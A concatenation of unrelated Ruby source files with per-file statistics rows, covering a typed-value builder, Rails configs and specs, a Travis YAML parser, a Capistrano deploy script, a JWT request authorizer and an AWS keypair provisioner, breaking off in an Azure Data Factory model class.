base = constraint ? ConstrainedType.new(self, &constraint) : self
base = base.dry_constrained(**dry_options) unless dry_options.empty?
base
end
def call(*args)
result = process((args + [Typed::Undefined]).first)
return result.value if result.ok
raise InvalidValue, result.message
end
def process(value)
Typed::Builder::Result.success(value)
end
protected
def dry_constrained(**options)
predicate = ::Dry::Logic::RuleCompiler.new(::Dry::Logic::Predicates).call(
options.map { |key, val|
::Dry::Logic::Rule::Predicate.new(
::Dry::Logic::Predicates[:"#{key}?"]
).curry(val).to_ast
}
).reduce(:and)
constrained do |value|
"#{value.inspect} violates #{predicate}" unless predicate.call(value).success?
end
end
private
def expected_type(type)
raise InvalidType, "Not a Typed type: #{type.inspect}" unless type.is_a?(BaseType)
end
end
class ArrayType
include BaseType
def initialize(element_type)
@element_type = element_type
end
def process(value)
return Result.failure { "Invalid collection: #{value.inspect}" } unless value.respond_to?(:each)
new_value = []
value.each do |element|
element_result = element_type.process(element)
return element_result unless element_result.ok
new_value << element_result.value
end
Result.success(new_value)
end
private
attr_reader :base_type, :element_type
end
class ConstrainedType
include BaseType
def initialize(base_type, &constraint)
@base_type = base_type
@constraint = constraint
end
def process(value)
result = base_type.process(value)
return result unless result.ok
error = constraint.call(result.value)
return result unless error
Result.failure { error }
end
private
attr_reader :base_type, :constraint
end
class DefaultType
include BaseType
def initialize(base_type, &default_value)
@base_type = base_type
@default_value = default_value
end
def process(value)
new_value = Typed::Undefined.equal?(value) ? default_value.call : value
base_type.process(new_value)
end
private
attr_reader :default_value, :base_type
end
class SumType
include BaseType
def initialize(type_a, type_b)
@type_a = type_a
@type_b = type_b
end
def process(value)
result = type_a.process(value)
return result if result.ok
type_b.process(value)
end
private
attr_reader :type_a, :type_b
end
class CoerceType
include BaseType
def initialize(input_type, return_type, swallow, &coercion)
@input_type = input_type
@return_type = return_type
@coercion = coercion
@swallow = swallow
end
def process(value)
# No coercion needed
passthrough_result = return_type.process(value)
return passthrough_result if passthrough_result.ok
# Check input_type enables this coercion
input_result = input_type.process(value)
if input_result.ok
coerced_value =
begin
coercion.call(input_result.value)
rescue *swallow
input_result.value
end
return return_type.process(coerced_value)
end
passthrough_result
end
private
attr_reader :input_type, :return_type, :coercion, :swallow
end
end
end
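# Rough usage sketch (AnyHandler and Typed.value are defined elsewhere in this
# library; names and values below are illustrative):
#   int = Typed::Builder.any.constrained(type: Integer).default(0)
#   int.call     # => 0
#   int.call(42) # => 42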
| 27.4125 | 112 | 0.489132 |
b9152b2bb97c42a4bd1eb4d72a770267a7e7dcbb | 2,344 | require 'active_support/core_ext/integer/time'
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.cache_classes = false
config.action_view.cache_template_loading = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure public file server for tests with Cache-Control for performance.
config.public_file_server.enabled = true
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{1.hour.to_i}"
}
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
config.cache_store = :null_store
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Store uploaded files on the local file system in a temporary directory.
config.active_storage.service = :test
config.action_mailer.perform_caching = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raise exceptions for disallowed deprecations.
config.active_support.disallowed_deprecation = :raise
# Tell Active Support which deprecation messages to disallow.
config.active_support.disallowed_deprecation_warnings = []
# Raises error for missing translations.
# config.i18n.raise_on_missing_translations = true
# Annotate rendered view with file names.
# config.action_view.annotate_rendered_view_with_filenames = true
end
| 38.42623 | 85 | 0.780717 |
21532358aee8c5373c055badbdc44d3381a85c70 | 460 | require 'spec_helper'
describe Notification do
it { should belong_to(:user) }
it { should belong_to(:action_user) }
it { should belong_to(:notifiable) }
it { should_not allow_mass_assignment_of(:user_id) }
it { should_not allow_mass_assignment_of(:action_user_id) }
it { should_not allow_mass_assignment_of(:notifiable_type) }
it { should_not allow_mass_assignment_of(:notifiable_id) }
it { should_not allow_mass_assignment_of(:unread) }
end
| 32.857143 | 62 | 0.769565 |
f742692f4831902ba6098b4002ed84933af8848a | 538 | require 'test_helper'
require 'merge_sort'
require 'sort_strategy_test'
class MergeSortTest < Minitest::Test
SORT_STRATEGY = MergeSort
include SortStrategyTest
def test_time_complexity_output
best = MergeSort::TIME_COMPLEXITY_BEST
worst = MergeSort::TIME_COMPLEXITY_WORST
average = MergeSort::TIME_COMPLEXITY_AVERAGE
space = MergeSort::SPACE_COMPLEXITY
assert_equal("O(n log(n))", worst)
assert_equal("O(n log(n))", best)
assert_equal("O(n log(n))", average)
assert_equal("O(n)", space)
end
end | 26.9 | 48 | 0.737918 |
28fb1bf561509701cc54c338331fc04d6edce984 | 314 | require 'test_helper'
class ServiceTypeTest < Test::Unit::TestCase
def test_new
membership = ServiceType.new('MEMBERSHIP', "Membership", "Membership for this shop.")
assert_equal "MEMBERSHIP", membership.id
end
def test_indexed
assert_equal 'MEMBERSHIP', ServiceType[:membership].id
end
end
| 22.428571 | 89 | 0.742038 |
e977fc0118f0335a3bea3b00b65de3e78d78957c | 1,976 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2018_06_05_041857) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "active_storage_attachments", force: :cascade do |t|
t.string "name", null: false
t.string "record_type", null: false
t.bigint "record_id", null: false
t.bigint "blob_id", null: false
t.datetime "created_at", null: false
t.index ["blob_id"], name: "index_active_storage_attachments_on_blob_id"
t.index ["record_type", "record_id", "name", "blob_id"], name: "index_active_storage_attachments_uniqueness", unique: true
end
create_table "active_storage_blobs", force: :cascade do |t|
t.string "key", null: false
t.string "filename", null: false
t.string "content_type"
t.text "metadata"
t.bigint "byte_size", null: false
t.string "checksum", null: false
t.datetime "created_at", null: false
t.string "service_name"
t.index ["key"], name: "index_active_storage_blobs_on_key", unique: true
end
create_table "active_storage_postgresql_files", force: :cascade do |t|
t.oid "oid"
t.string "key"
t.index ["key"], name: "index_active_storage_postgresql_files_on_key", unique: true
end
end
| 42.042553 | 126 | 0.742409 |
280d88bd05153d011f3c5d9c510fb626cbe84ad3 | 2,722 | # == Schema Information
#
# Table name: tafsirs
#
# id :integer not null, primary key
# group_verse_key_from :string
# group_verse_key_to :string
# group_verses_count :integer
# hizb_number :integer
# juz_number :integer
# language_name :string
# manzil_number :integer
# page_number :integer
# resource_name :string
# rub_el_hizb_number :integer
# ruku_number :integer
# surah_ruku_number :integer
# text :text
# verse_key :string
# verse_number :integer
# created_at :datetime not null
# updated_at :datetime not null
# chapter_id :integer
# end_verse_id :integer
# group_tafsir_id :integer
# language_id :integer
# resource_content_id :integer
# start_verse_id :integer
# verse_id :integer
#
# Indexes
#
# index_tafsirs_on_chapter_id (chapter_id)
# index_tafsirs_on_chapter_id_and_verse_number (chapter_id,verse_number)
# index_tafsirs_on_end_verse_id (end_verse_id)
# index_tafsirs_on_hizb_number (hizb_number)
# index_tafsirs_on_juz_number (juz_number)
# index_tafsirs_on_language_id (language_id)
# index_tafsirs_on_manzil_number (manzil_number)
# index_tafsirs_on_page_number (page_number)
# index_tafsirs_on_resource_content_id (resource_content_id)
# index_tafsirs_on_rub_el_hizb_number (rub_el_hizb_number)
# index_tafsirs_on_ruku_number (ruku_number)
# index_tafsirs_on_start_verse_id (start_verse_id)
# index_tafsirs_on_verse_id (verse_id)
# index_tafsirs_on_verse_key (verse_key)
#
# frozen_string_literal: true
require 'rails_helper'
RSpec.describe Tafsir do
context 'with associations' do
it { is_expected.to belong_to :verse }
it { is_expected.to belong_to :language }
it { is_expected.to belong_to :resource_content }
it { is_expected.to have_many :foot_notes }
end
context 'with columns and indexes' do
columns = {
verse_id: :integer,
language_id: :integer,
text: :text,
language_name: :string,
resource_content_id: :integer,
resource_name: :string,
verse_key: :string
}
indexes = [
['language_id'],
['resource_content_id'],
['verse_id'],
['verse_key']
]
it_behaves_like 'modal with column', columns
it_behaves_like 'modal have indexes on column', indexes
end
end
| 32.404762 | 74 | 0.616458 |
1859721778fd6cd14ea38fac35338e8a727ed0d3 | 8,675 | require 'psych'
require 'delegate'
module Travis::Yaml
module Parser
class Psych
class SetNode < DelegateClass(::Psych::Nodes::Mapping)
def children
super.select.with_index { |_,i| i.even? }
end
end
class ScalarSequence < DelegateClass(::Psych::Nodes::Mapping)
def children
[__getobj__]
end
end
MAP = /\A(?:tag:yaml\.org,2002:|!!?)map\z/
OMAP = /\A(?:tag:yaml\.org,2002:|!!?)omap\z/
PAIRS = /\A(?:tag:yaml\.org,2002:|!!?)pairs\z/
SET = /\A(?:tag:yaml\.org,2002:|!!?)set\z/
SEQ = /\A(?:tag:yaml\.org,2002:|!!?)seq\z/
BINARY = /\A(?:tag:yaml\.org,2002:|!!?)binary\z/
BOOL = /\A(?:tag:yaml\.org,2002:|!!?)bool\z/
FLOAT = /\A(?:tag:yaml\.org,2002:|!!?)float\z/
INT = /\A(?:tag:yaml\.org,2002:|!!?)int\z/
MERGE = /\A(?:tag:yaml\.org,2002:|!!?)merge\z/
NULL = /\A(?:tag:yaml\.org,2002:|!!?)null\z/
STR = /\A(?:tag:yaml\.org,2002:|!!?)str\z/
TIMESTAMP = /\A(?:tag:yaml\.org,2002:|!!?)timestamp\z/
VALUE = /\A(?:tag:yaml\.org,2002:|!!?)value\z/
YAML = /\A(?:tag:yaml\.org,2002:|!!?)yaml\z/
SECURE = /\A!(?:encrypted|secure|decrypted)\z/
TRUE = /\A(?:y|Y|yes|Yes|YES|true|True|TRUE|on|On|ON)\z/
FALSE = /\A(?:n|N|no|No|NO|false|False|FALSE|off|Off|OFF)\z/
REGEXP = /\A!(?:ruby\/)?regexp\z/
REG_FLAGS = { 'i' => Regexp::IGNORECASE, 'm' => Regexp::MULTILINE, 'x' => Regexp::EXTENDED }
FORMATS = {
'!bool' => Regexp.union(TRUE, FALSE),
'!float' => ::Psych::ScalarScanner::FLOAT,
'!null' => /\A(:?~|null|Null|NULL|)\z/,
'!timestamp' => ::Psych::ScalarScanner::TIME,
'!int' => ::Psych::ScalarScanner::INTEGER,
'!regexp' => /\A\/(.*)\/([imx]*)\z/
}
if defined? ::Psych::ClassLoader
CLASS_LOADER = ::Psych::ClassLoader.new
class ScalarScanner < ::Psych::ScalarScanner
def initialize
super(CLASS_LOADER)
end
end
else
ScalarScanner = ::Psych::ScalarScanner
end
def self.parses?(value)
return true if value.is_a?(::Psych::Nodes::Node)
return true if value.is_a?(String) or value.is_a?(IO)
return true if defined?(StringIO) and value.is_a?(StringIO)
value.respond_to?(:to_str) or value.respond_to?(:to_io)
end
def self.parse(value)
new(value).parse
end
def initialize(value)
value = value.to_str if value.respond_to? :to_str
value = value.to_io if value.respond_to? :to_io
@value = value
@scanner = ScalarScanner.new
end
def parse(root = nil)
root ||= Travis::Yaml::Nodes::Root.new
parsed = @value if @value.is_a? ::Psych::Nodes::Node
parsed ||= ::Psych.parse(@value)
accept(root, parsed)
root
rescue ::Psych::SyntaxError => error
root.verify
root.warnings.clear
root.error("syntax error: %s", error.message)
root
end
def accept(node, value)
case value
when ::Psych::Nodes::Scalar then accept_scalar node, value
when ::Psych::Nodes::Mapping then accept_mapping node, value
when ::Psych::Nodes::Sequence then accept_sequence node, value
when ::Psych::Nodes::Alias then accept_alias node, value
when ::Psych::Nodes::Document then accept node, value.root
when ::Psych::Nodes::Stream then accept_sequence node, value
else node.visit_unexpected(self, value) if value
end
node.verify
end
def accept_sequence(node, value)
case value.tag
when SET, SEQ
node.visit_sequence self, value
when nil
value = ScalarSequence.new(value) unless value.is_a? ::Psych::Nodes::Sequence
node.visit_sequence self, value
else
node.visit_sequence self, ScalarSequence.new(value)
end
end
def accept_mapping(node, value)
case value.tag
when MAP, OMAP, PAIRS then node.visit_mapping self, value
when SET then node.visit_sequence self, SetNode.new(value)
when SEQ then node.visit_sequence self, value
when nil
if value.children.size == 2 and value.children.first.value == 'secure'
secret_value = value.children.last
if secret_value.is_a? ::Psych::Nodes::Scalar
secret_value.tag ||= '!secure'
node.visit_scalar(self, :secure, secret_value, false)
else
node.visit_unexpected(self, value, "secret value needs to be a string")
end
else
node.visit_mapping(self, value)
end
else
node.visit_unexpected self, value, "unexpected tag %p for mapping" % value.tag
end
end
def accept_scalar(node, value)
case tag = scalar_tag(value)
when BINARY then node.visit_scalar self, :binary, value, value.tag.nil?
when BOOL then node.visit_scalar self, :bool, value, value.tag.nil?
when FLOAT then node.visit_scalar self, :float, value, value.tag.nil?
when INT then node.visit_scalar self, :int, value, value.tag.nil?
when NULL then node.visit_scalar self, :null, value, value.tag.nil?
when STR then node.visit_scalar self, :str, value, value.tag.nil?
when TIMESTAMP then node.visit_scalar self, :time, value, value.tag.nil?
when SECURE then node.visit_scalar self, :secure, value, value.tag.nil?
when REGEXP then node.visit_scalar self, :regexp, value, value.tag.nil?
else node.visit_unexpected self, value, "unexpected tag %p for scalar %p" % [tag, simple(value)]
end
end
def simple(value)
case value
when ::Psych::Nodes::Scalar then value.value
when ::Psych::Nodes::Mapping then simple_mapping(value)
when ::Psych::Nodes::Sequence then value.children.map { |c| simple(c) }
when ::Psych::Nodes::Document then simple(value.root)
when ::Psych::Nodes::Stream then value.children.map { |c| simple(c) }
else value
end
end
def simple_mapping(value)
children = {}
keys, values = value.children.group_by.with_index { |_,i| i.even? }.values_at(true, false)
keys.zip(values) { |key, value| children[simple(key)] = simple(value) } if keys and values
children
end
def scalar_tag(value)
return value.tag if value.tag
return '!str' if value.quoted
FORMATS.each do |tag, format|
return tag if value.value =~ format
end
'!str'
end
def regexp(pattern)
return pattern if pattern.is_a? Regexp
return Regexp.new(pattern) unless pattern =~ FORMATS['!regexp']
flag = $2.chars.inject(0) { |f,c| f | REG_FLAGS.fetch(c, 0) }
Regexp.new($1, flag)
rescue RegexpError => error
raise ArgumentError, "broken regular expression - #{error.message}"
end
def cast(type, value)
case type
when :str then value.value
when :binary then value.value.unpack('m').first
when :bool then value.value !~ FALSE
when :float then Float @scanner.tokenize(value.value)
when :int then Integer @scanner.tokenize(value.value)
when :time then @scanner.parse_time(value.value)
when :secure then SecureString.new(value.value, value.tag != '!decrypted')
when :regexp then regexp(value.value)
when :null then nil
else raise ArgumentError, 'unknown scalar type %p' % type
end
end
def apply_mapping(node, value)
keys, values = value.children.group_by.with_index { |_,i| i.even? }.values_at(true, false)
keys.zip(values) { |key, value| node.visit_pair(self, key, value) } if keys and values
end
def apply_sequence(node, value)
value.children.each { |child| node.visit_child(self, child) }
end
def generate_key(node, value)
        if value.respond_to? :value and (value.tag.nil? || value.tag =~ STR)
value = value.value.to_s
value.start_with?(?:) ? value[1..-1] : value
else
node.visit_unexpected(self, value, "expected string as key")
end
end
end
end
end
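# Usage sketch (hypothetical input; assumes the surrounding travis-yaml gem and
# Travis::Yaml::Nodes::Root, referenced above, are loaded):
#   root = Travis::Yaml::Parser::Psych.parse("language: ruby\nrvm:\n  - 2.5")
#   root # => Travis::Yaml::Nodes::Root with any errors/warnings recorded on it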
| 38.727679 | 104 | 0.575908 |
bb734ffea20de5a60c42ae3c06005fbb2f0d1950 | 628 | Pod::Spec.new do |s|
s.name = "TLTiltSlider"
s.version = "1.0"
s.summary = "A UISlider subclass which adjusts its appearance based on the positional attitude of an iOS device."
s.homepage = "https://github.com/TeehanLax/TLTiltSlider"
s.license = 'MIT'
s.author = { "Ash Furrow" => "[email protected]" }
s.source = { :git => "https://github.com/TeehanLax/TLTiltSlider.git", :tag => "1.0" }
s.platform = :ios, '5.0'
s.source_files = 'TLTiltSlider.h', 'TLTiltSlider.m'
s.resources = "Resources/*.png"
s.frameworks = 'CoreMotion', 'UIKit'
s.requires_arc = true
end
| 41.866667 | 120 | 0.622611 |
6aa6bbc5989d8caf5a2e476a8d9f57facde49e3d | 264 | class Rsvps < ActiveRecord::Migration[6.0]
def change
create_table :rsvps do |t|
t.datetime :created_at
t.integer :user_id, index: true, foreign_key: true
t.integer :event_id, index: true, foreign_key: true
end
end
end
| 24 | 58 | 0.640152 |
f8c55067073b2c082ce2b2bd65fe0d69f00b12fc | 1,598 | require_relative '../spec_helper.rb'
describe 'neo4j::config' do
let(:chef_run) { ChefSpec::SoloRunner.new.converge(described_recipe) }
let(:neo4j_server_properties_template) { chef_run.template('/var/lib/neo4j/conf/neo4j-server.properties') }
let(:neo4j_properties_template) { chef_run.template('/var/lib/neo4j/conf/neo4j.properties') }
let(:neo4j_wrapper_template) { chef_run.template('/var/lib/neo4j/conf/neo4j-wrapper.conf') }
let(:neo4j_logging_properties_template) { chef_run.template('/var/lib/neo4j/conf/logging.properties') }
it 'should create /var/lib/neo4j/conf/neo4j-server.properties' do
expect(chef_run).to create_template('/var/lib/neo4j/conf/neo4j-server.properties')
expect(neo4j_server_properties_template).to notify('service[neo4j]').delayed
end
it 'should create /var/lib/neo4j/conf/neo4j.properties' do
expect(chef_run).to create_template('/var/lib/neo4j/conf/neo4j.properties')
    expect(neo4j_properties_template).to notify('service[neo4j]').delayed
end
it 'should create /var/lib/neo4j/conf/neo4j-wrapper.conf' do
expect(chef_run).to create_template('/var/lib/neo4j/conf/neo4j-wrapper.conf')
    expect(neo4j_wrapper_template).to notify('service[neo4j]').delayed
end
it 'should create /var/lib/neo4j/conf/logging.properties' do
expect(chef_run).to create_template('/var/lib/neo4j/conf/logging.properties')
expect(neo4j_logging_properties_template).to notify('service[neo4j]').delayed
end
it 'includes the neo4j::service recipe' do
expect(chef_run).to include_recipe('neo4j::service')
end
end
| 47 | 109 | 0.765332 |
3800f1e34fab39ae707802b30e18c6c9be36cd81 | 4,830 | # frozen_string_literal: true
# == Schema Information
#
# Table name: pledges
#
# id :integer not null, primary key
# user_id :integer
# created_at :datetime not null
# updated_at :datetime not null
# wishlist_item_id :integer
# quantity :integer default(1), not null
#
require 'rails_helper'
describe Pledge do
# validations
describe 'without an associated wishlist item' do
subject { build(:pledge, wishlist_item: nil) }
it { should_not be_valid }
end
describe 'without an associated user' do
subject { build(:pledge, user: nil) }
it { should be_valid }
end
describe 'without a quantity' do
subject { build(:pledge, quantity: nil) }
it { should_not be_valid }
end
describe 'with a quantity of 0' do
subject { build(:pledge, quantity: 0) }
it { should_not be_valid }
end
describe 'uniqueness validation' do
let(:initial_pledge) { create(:pledge, :with_user) }
context 'when the user and wishlist are duplicated' do
subject do
build(:pledge, user: initial_pledge.user,
wishlist_item: initial_pledge.wishlist_item)
end
it { should_not be_valid }
end
context 'when the user is duplicated but not the wishlist' do
subject { build(:pledge, user: initial_pledge.user) }
it { should be_valid }
end
context 'when the wishlist item is duplicated but not the user' do
subject { build(:pledge, wishlist_item: initial_pledge.wishlist_item) }
it { should be_valid }
end
context 'when the user is nil' do
it 'should allow for "duplicate" pledges' do
wishlist_item = create(:wishlist_item)
create(:pledge, user: nil, wishlist_item: wishlist_item)
anon_pledge = build(:pledge, wishlist_item: wishlist_item)
expect(anon_pledge).to be_valid
end
end
end
describe '#edited?' do
let(:pledge) { create(:pledge) }
context "when it's not been updated" do
subject { pledge.edited? }
it { should be false }
end
context 'when it has been updated' do
before { pledge.update!(quantity: 2) }
subject { pledge.edited? }
it { should be true }
end
end
describe '#anonymous?' do
context "when it's owned by a user" do
subject { create(:pledge, :with_user).anonymous? }
it { should be false }
end
context "when it's not owned by a user" do
subject { create(:pledge, user: nil).anonymous? }
it { should be true }
end
end
describe '#claim_or_increment' do
context 'when another pledge with those attributes exists' do
let(:user) { create(:user) }
let(:existing_pledge) { create(:pledge, user: user) }
let(:pledge) { create(:pledge, user: nil, wishlist_item: existing_pledge.wishlist_item) }
it 'should belong to user' do
pledge.claim_or_increment(user_id: user.id)
expect(pledge.reload.user).to eq user
end
it 'should delete the previous pledge' do
expect do
pledge.claim_or_increment(user_id: user.id)
end.to change(Pledge, :count).by(1)
end
it 'should increment the quantity' do
pledge.claim_or_increment(user_id: user.id)
expect(pledge.reload.quantity).to eq 2
end
end
context "when it's a unique pledge" do
it 'should belong to the user' do
user = create(:user)
pledge = create(:pledge, user: nil)
pledge.claim_or_increment(user_id: user.id)
expect(pledge.reload.user).to eq user
end
end
end
describe '.generate_csv' do
before { create(:pledge, user: create(:user, name: 'Tony Stark')) }
subject(:csv) { Pledge.generate_csv }
it 'should generate a csv' do
expect(csv).to include 'user,'
expect(csv).to include 'Tony Stark'
end
end
describe '.increment_or_new' do
let(:params) do
attributes_for(:pledge).merge(
# attributes_for doesn't include associations
user_id: create(:user).id,
wishlist_item_id: create(:wishlist_item).id
)
end
context "when identical pledge doesn't exist" do
it 'should build a new pledge' do
pledge = Pledge.increment_or_new(params)
expect(pledge).to be_new_record
end
end
context 'when identical pledge does exist' do
before { create(:pledge, params) }
it 'should fetch an existing record' do
pledge = Pledge.increment_or_new(params)
expect(pledge).to be_persisted
end
it 'should increment the existing pledge quantity' do
pledge = Pledge.increment_or_new(params)
expect(pledge).to be_quantity_changed
expect(pledge.quantity).to eq 2
end
end
end
end
| 27.919075 | 95 | 0.637888 |
b9c678e012941a53597eb8bfbc9680b1407c1e7d | 134 | require 'rails_helper'
RSpec.describe PostPostCategory, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
| 22.333333 | 56 | 0.761194 |
f8468eebf017eb9e497fc2b47df8c2a938fbca0f | 962 | class AuthorizeApiRequest
def initialize(headers = {})
@headers = headers
end
# Service entry point - return valid user object
def call
{
user: user
}
end
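  # Usage sketch (hypothetical caller such as a base API controller):
  #   user = AuthorizeApiRequest.new(request.headers).call[:user]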
private
attr_reader :headers
def user
# check if user is in the database
# memoize user object
@user ||= User.find(decoded_auth_token[:user_id]) if decoded_auth_token
# handle user not found
rescue ActiveRecord::RecordNotFound => e
# raise custom error
raise(
ExceptionHandler::InvalidToken,
("#{Message.invalid_token} #{e.message}")
)
end
# decode authentication token
def decoded_auth_token
@decoded_auth_token ||= JsonWebToken.decode(http_auth_header)
end
# check for token in `Authorization` header
def http_auth_header
if headers['Authorization'].present?
return headers['Authorization'].split(' ').last
end
raise(ExceptionHandler::MissingToken, Message.missing_token)
end
end | 22.904762 | 75 | 0.686071 |
393733730f88881b31b9c4fc40ce3b4cfbd67551 | 501 | module Kontena::Cli::Vault
class UpdateCommand < Clamp::Command
include Kontena::Cli::Common
parameter 'NAME', 'Secret name'
parameter '[VALUE]', 'Secret value'
def execute
require_api_url
token = require_token
secret = value
if secret.to_s == ''
secret = STDIN.read
end
abort('No value provided') if secret.to_s == ''
data = {value: secret}
client(token).put("grids/#{current_grid}/secrets/#{name}", data)
end
end
end
| 23.857143 | 70 | 0.61477 |
115ca932f3eeca93cdb72962806c2de24f28573a | 131 | ## $:.unshift(File.dirname(__FILE__))
## minitest setup
require 'minitest/autorun'
## our own code
require 'base32-alphabets'
| 11.909091 | 37 | 0.709924 |
e24f97bdd4661c5718f76c0251d53bbf86dad164 | 2,733 | # config valid for current version and patch releases of Capistrano
lock "~> 3.11.0"
set :repo_url, '[email protected]:ali-hassan/decomates.git'
set :application, 'marketplace'
set :user, 'ubuntu'
set :puma_threads, [4, 16]
set :puma_workers, 3
# Don't change these unless you know what you're doing
set :pty, true
# set :use_sudo, false
# set :deploy_via, :remote_cache
set :deploy_to, "/home/#{fetch(:user)}/var/www/#{fetch(:application)}"
set :puma_bind, "unix://#{shared_path}/tmp/sockets/marketplace-puma.sock"
set :puma_state, "#{shared_path}/tmp/pids/puma.state"
set :puma_pid, "#{shared_path}/tmp/pids/puma.pid"
set :puma_access_log, "#{release_path}/log/puma.access.log"
set :puma_error_log, "#{release_path}/log/puma.error.log"
set :whenever_identifier, ->{ "#{fetch(:application)}_#{fetch(:stage)}" }
# set :ssh_options, { forward_agent: true, user: fetch(:user), keys: %w(~/.ssh/id_rsa.pub) }
set :puma_preload_app, true
set :puma_init_active_record, true # Change to false when not using ActiveRecord
set :linked_files, %w{config/database.yml config/secrets.yml config/config.yml}
set :linked_dirs, %w{log tmp/pids tmp/cache tmp/sockets vendor/bundle public/system public/reports}
append :asdf_map_ruby_bins, 'puma', 'pumactl'
namespace :puma do
desc 'Create Directories for Puma Pids and Socket'
task :make_dirs do
on roles(:app) do
execute "mkdir #{shared_path}/tmp/sockets -p"
execute "mkdir #{shared_path}/tmp/pids -p"
end
end
before :start, :make_dirs
end
namespace :deploy do
desc "Make sure local git is in sync with remote."
task :check_revision do
on roles(:app) do
unless `git rev-parse HEAD` == `git rev-parse origin/#{fetch(:branch)}`
puts "WARNING: HEAD is not the same as origin/#{fetch(:branch)}"
puts "Run `git push` to sync changes."
exit
end
end
end
desc 'Initial Deploy'
task :initial do
on roles(:app) do
before 'deploy:restart', 'puma:start'
invoke 'deploy'
end
end
desc 'Upload to shared/config'
task :upload do
    on roles(:app) do
upload! "config/database.yml", "#{shared_path}/config/database.yml"
upload! "config/secrets.yml", "#{shared_path}/config/secrets.yml"
end
end
before :starting, :check_revision
before 'check:linked_files', 'puma:config'
after :finishing, :compile_assets
after :finishing, :cleanup
end
desc "Run rake db:seed on a remote server."
task :seed do
  on roles(:app) do
within release_path do
with rails_env: fetch(:rails_env) do
execute :rake, "db:seed"
end
end
end
end
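# Usage sketch (stage name is hypothetical):
#   cap production deploy:initial   # first deploy, starts Puma
#   cap production deploy           # subsequent deploys
#   cap production seed             # run rake db:seed on the remote server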
# ps aux | grep puma # Get puma pid | 31.056818 | 100 | 0.669594 |
b9ed541254a2047a58210fc86569e55698381df1 | 1,061 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'hashie_mash_knockoff/version'
Gem::Specification.new do |spec|
spec.name = 'hashie_mash_knockoff'
spec.version = HashieMashKnockoff::VERSION
spec.authors = ['Michael Pope']
spec.email = ['[email protected]']
spec.summary = %q{A Hashie::Mash knockoff}
spec.description = spec.summary
spec.homepage = 'https://github.com/amorphid/hashie_mash_knockoff'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler', '~> 1.10'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec', '~> 3.3'
spec.add_runtime_dependency 'json', '~> 1.8'
spec.add_runtime_dependency 'srm', '~> 0.1'
end
| 36.586207 | 104 | 0.653157 |
918f87f9a092b0da845e82b28b2e3e56211ca849 | 613 | # == Schema Information
#
# Table name: containers
#
# content :jsonb
# created_at :datetime not null
# id :integer not null, primary key
# locale :string
# page_id :integer
# row_order :integer
# slug :string
# type :string
# updated_at :datetime not null
#
class Container::Markdown < ::Container
store_accessor :content, :markdown
def custom_container_permitted_attributes
%i(markdown)
end
  def renderer(options={})
    Redcarpet::Markdown.new(
      Redcarpet::Render::HTML,
      { autolink: true, tables: true }.merge(options) # honor caller-supplied options instead of ignoring them
    )
end
end
| 20.433333 | 53 | 0.624796 |
1c24ab9927e59bc07c8480d3f8de9fe85247e6fe | 971 | require_relative 'common'
module Kontena::Machine::Aws
class KeypairProvisioner
attr_reader :ec2, :region, :public_key, :keypair_name
# @param [String] access_key_id aws_access_key_id
# @param [String] secret_key aws_secret_access_key
# @param [String] region
def initialize(access_key_id, secret_key, region)
@ec2 = ::Aws::EC2::Resource.new(
region: region, credentials: ::Aws::Credentials.new(access_key_id, secret_key)
)
end
def validate_opts!(opts)
if opts[:public_key]
@public_key = opts[:public_key]
else
raise "Missing public key"
end
@keypair_name = opts[:keypair_name] || "kontena-#{SecureRandom.hex(4)}-#{Time.now.strftime '%Y-%m-%d'}"
end
# @param [Hash] opts
def run!(opts)
validate_opts!(opts)
ec2.import_key_pair(
key_name: keypair_name,
public_key_material: public_key,
dry_run: false
)
end
end
end
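# Usage sketch (hypothetical credentials; the key pair name is auto-generated
# when :keypair_name is omitted):
#   provisioner = Kontena::Machine::Aws::KeypairProvisioner.new(access_key, secret_key, 'eu-west-1')
#   provisioner.run!(public_key: File.read(File.expand_path('~/.ssh/id_rsa.pub')))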
| 24.897436 | 109 | 0.644696 |
628421f69d243b8143c81d9e5c4a3564fcfe7921 | 128 | class AddRecipeToComments < ActiveRecord::Migration[6.0]
def change
add_column :comments, :recipe, :text
end
end
| 18.285714 | 56 | 0.703125 |
e28163ae454cb76b623fec58e4400e70367662df | 5,373 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataFactory::Mgmt::V2018_06_01
module Models
#
# Spark Server dataset.
#
class SparkObjectDataset < Dataset
include MsRestAzure
def initialize
@type = "SparkObject"
end
attr_accessor :type
# @return This property will be retired. Please consider using schema +
# table properties instead.
attr_accessor :table_name
# @return The table name of the Spark. Type: string (or Expression with
# resultType string).
attr_accessor :table
# @return The schema name of the Spark. Type: string (or Expression with
# resultType string).
